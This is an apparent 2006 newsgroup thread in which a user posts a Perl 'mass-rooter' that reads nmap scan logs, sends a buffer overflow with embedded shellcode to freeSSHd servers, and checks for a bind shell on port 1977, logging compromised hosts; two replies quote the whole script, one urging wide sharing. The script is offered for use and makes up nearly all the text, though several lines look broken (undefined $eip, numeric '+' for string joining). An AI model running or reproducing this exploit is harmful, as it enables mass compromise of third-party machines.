freesshd 1.0.9 massr00ter

Discussion in 'Computer Security' started by cyberstorm, Jun 17, 2006.


    Here is a freeSSHd mass-rooter. It checks and hacks hosts taken
    from nmap port-scan logs. Have fun with
    this tool:

    #!/usr/bin/perl

    use Socket;
    use IO::Socket::INET;

    my $port = '22';
    my @banner = (22);
    my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
    "+ +\n".
    "+ freeSSHd 1.0.9 Mass r00ter +\n".
    "+ +\n".
    "+ Author: cyberstorm +\n".
    "+ Contact: cyberstorm187[at]arcor.de +\n".
    "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
    "+ +\n".
    "+++++++++++++++++++++++++++++++++++++++++++++\n";

    my $shellcode =
    "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
    "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
    "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
    "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
    "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
    "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
    "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
    "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
    "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
    "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
    "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
    "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
    "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
    "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
    "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
    "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
    "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
    "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
    "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
    "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";

    print "$info";
    &usage if !@ARGV; &main;


    sub main {
    while (<>) {
    if (/^Interesting ports on.*\((\S+)\):/) {
    $ip = $1; $i++;
    } foreach $port (@banner) {
    if (/^$port\/(\w+)\s+open/) {
    $proto = $1; $p++;
    &banner($ip, $port, $proto);
    }
    }
    } &stats;
    }

    sub banner {
    my ($ip, $port, $proto) = @_;
    print "$ip:$port\t=> ";
    socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    if ($port != 80) {
    $banner =<SOCK>;
    close(SOCK);
    print "$banner";
    } else {
    send(SOCK, "GET / HTTP/1.0\n\n", 0);
    @o = <SOCK>;
    close(SOCK);
    foreach (@o) {
    if (/Server:\s(.*)/) {
    $banner = $1;
    print "$banner";
    }
    }
    }
    if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
    &exploit($ip,$port,$proto);
    }
    }

    sub exploit {
    my ($ip,$port,$proto) = @_;
    if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
    my $buff =
    "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48".
    "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde";

    my $buff = $buff + "A" * 1055;
    my $buff = $buff + $eip;
    my $buff = $buff + "yyyy";
    my $buff = $buff + "\x90" * 4;
    my $buff = $buff + $shellcode;
    my $buff = $buff + "B" * 19021 + "\r\n";

    print "[~] Try to connect to $ip\n";
    socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    print "[~] Creating Buffer\n";
    send(SOCK, $buff, 0);
    close(SOCK);
    print "[~] Send Buffer\n";
    print "[~] checking ...\n";

    sleep(1);
    if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
    print "[~] YoU got an Shell\n".
    "Connect over Telnet on Port 1977\n";
    open(OUTPUT, '>>freesshd.txt');
    print OUTPUT "$ip\n";
    close(OUTPUT);
    } else {
    print "Sorry, Dude !\n";
    }
    }
    }

    # Print the one-line invocation summary to STDOUT. Does not exit, so the
    # caller continues after this returns.
    sub usage {
        my $help_text = "freesshd.pl <infile>\n";
        print $help_text;
        return;
    }
    cyberstorm, Jun 17, 2006


    cyberstorm wrote:
    > Here is an freesshd massrooter it will be check and hack
    > from the nmap portscan logs. Have Fun with
    > this tool:
    >
    > #!/usr/bin/perl
    >
    > use Socket;
    > use IO::Socket::INET;
    >
    > my $port = '22';
    > my @banner = (22);
    > my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
    > "+ +\n".
    > "+ freeSSHd 1.0.9 Mass r00ter +\n".
    > "+ +\n".
    > "+ Author: cyberstorm +\n".
    > "+ Contact: cyberstorm187[at]arcor.de +\n".
    > "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
    > "+ +\n".
    > "+++++++++++++++++++++++++++++++++++++++++++++\n";
    >
    > my $shellcode =
    > "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
    > "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
    > "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
    > "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
    > "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
    > "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
    > "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
    > "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
    > "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
    > "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
    > "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
    > "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
    > "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
    > "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
    > "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
    > "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
    > "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
    > "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
    > "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
    > "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";
    >
    > print "$info";
    > &usage if !@ARGV; &main;
    >
    >
    > sub main {
    > while (<>) {
    > if (/^Interesting ports on.*\((\S+)\):/) {
    > $ip = $1; $i++;
    > } foreach $port (@banner) {
    > if (/^$port\/(\w+)\s+open/) {
    > $proto = $1; $p++;
    > &banner($ip, $port, $proto);
    > }
    > }
    > } &stats;
    > }
    >
    > sub banner {
    > my ($ip, $port, $proto) = @_;
    > print "$ip:$port\t=> ";
    > socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    > connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    > if ($port != 80) {
    > $banner =<SOCK>;
    > close(SOCK);
    > print "$banner";
    > } else {
    > send(SOCK, "GET / HTTP/1.0\n\n", 0);
    > @o = <SOCK>;
    > close(SOCK);
    > foreach (@o) {
    > if (/Server:\s(.*)/) {
    > $banner = $1;
    > print "$banner";
    > }
    > }
    > }
    > if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
    > &exploit($ip,$port,$proto);
    > }
    > }
    >
    > sub exploit {
    > my ($ip,$port,$proto) = @_;
    > if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
    > my $buff =
    > "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48".
    > "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00".
    > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde";
    >
    > my $buff = $buff + "A" * 1055;
    > my $buff = $buff + $eip;
    > my $buff = $buff + "yyyy";
    > my $buff = $buff + "\x90" * 4;
    > my $buff = $buff + $shellcode;
    > my $buff = $buff + "B" * 19021 + "\r\n";
    >
    > print "[~] Try to connect to $ip\n";
    > socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    > connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    > print "[~] Creating Buffer\n";
    > send(SOCK, $buff, 0);
    > close(SOCK);
    > print "[~] Send Buffer\n";
    > print "[~] checking ...\n";
    >
    > sleep(1);
    > if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
    > print "[~] YoU got an Shell\n".
    > "Connect over Telnet on Port 1977\n";
    > open(OUTPUT, '>>freesshd.txt');
    > print OUTPUT "$ip\n";
    > close(OUTPUT);
    > } else {
    > print "Sorry, Dude !\n";
    > }
    > }
    > }
    >
    > sub usage {
    > print "freesshd.pl <infile>\n";
    > }
    >

    Keep it PRIVATE PRIVATE!!!
    By posting it to a newsgroup LOL
    Geordie Guy, Jun 17, 2006


    Geordie Guy wrote:

    > cyberstorm wrote:
    >> Here is an freesshd massrooter it will be check and hack
    >> from the nmap portscan logs. Have Fun with
    >> this tool:
    >>
    >> #!/usr/bin/perl
    >>
    >> use Socket;
    >> use IO::Socket::INET;
    >>
    >> my $port = '22';
    >> my @banner = (22);
    >> my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
    >> "+ +\n".
    >> "+ freeSSHd 1.0.9 Mass r00ter +\n".
    >> "+ +\n".
    >> "+ Author: cyberstorm +\n".
    >> "+ Contact: cyberstorm187[at]arcor.de +\n".
    >> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
    >> "+ +\n".
    >> "+++++++++++++++++++++++++++++++++++++++++++++\n";
    >>
    >> my $shellcode =
    >> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
    >> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
    >> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
    >> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
    >> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
    >> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
    >> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
    >> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
    >> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
    >> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
    >> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
    >> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
    >> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
    >> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
    >> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
    >> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
    >> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
    >> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
    >> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
    >> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";
    >>
    >> print "$info";
    >> &usage if !@ARGV; &main;
    >>
    >>
    >> sub main {
    >> while (<>) {
    >> if (/^Interesting ports on.*\((\S+)\):/) {
    >> $ip = $1; $i++;
    >> } foreach $port (@banner) {
    >> if (/^$port\/(\w+)\s+open/) {
    >> $proto = $1; $p++;
    >> &banner($ip, $port, $proto);
    >> }
    >> }
    >> } &stats;
    >> }
    >>
    >> sub banner {
    >> my ($ip, $port, $proto) = @_;
    >> print "$ip:$port\t=> ";
    >> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    >> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    >> if ($port != 80) {
    >> $banner =<SOCK>;
    >> close(SOCK);
    >> print "$banner";
    >> } else {
    >> send(SOCK, "GET / HTTP/1.0\n\n", 0);
    >> @o = <SOCK>;
    >> close(SOCK);
    >> foreach (@o) {
    >> if (/Server:\s(.*)/) {
    >> $banner = $1;
    >> print "$banner";
    >> }
    >> }
    >> }
    >> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
    >> &exploit($ip,$port,$proto);
    >> }
    >> }
    >>
    >> sub exploit {
    >> my ($ip,$port,$proto) = @_;
    >> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
    >> my $buff =
    >> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48".
    >> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00".
    >> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde";
    >>
    >> my $buff = $buff + "A" * 1055;
    >> my $buff = $buff + $eip;
    >> my $buff = $buff + "yyyy";
    >> my $buff = $buff + "\x90" * 4;
    >> my $buff = $buff + $shellcode;
    >> my $buff = $buff + "B" * 19021 + "\r\n";
    >>
    >> print "[~] Try to connect to $ip\n";
    >> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    >> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    >> print "[~] Creating Buffer\n";
    >> send(SOCK, $buff, 0);
    >> close(SOCK);
    >> print "[~] Send Buffer\n";
    >> print "[~] checking ...\n";
    >>
    >> sleep(1);
    >> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
    >> print "[~] YoU got an Shell\n".
    >> "Connect over Telnet on Port 1977\n";
    >> open(OUTPUT, '>>freesshd.txt');
    >> print OUTPUT "$ip\n";
    >> close(OUTPUT);
    >> } else {
    >> print "Sorry, Dude !\n";
    >> }
    >> }
    >> }
    >>
    >> sub usage {
    >> print "freesshd.pl <infile>\n";
    >> }
    >>

    > Keep it PRIVATE PRIVATE!!!
    > By posting it to a news group LOL



    No, share, share, share!!!

    Im
    --
    *************************************
    Pass a Net Neutrality Law in the US!!!!

    Save the Internet:
    http://www.savetheinternet.com/

    Its our net:
    http://www.itsournet.org/

    *************************************
    imhotep, Jun 18, 2006
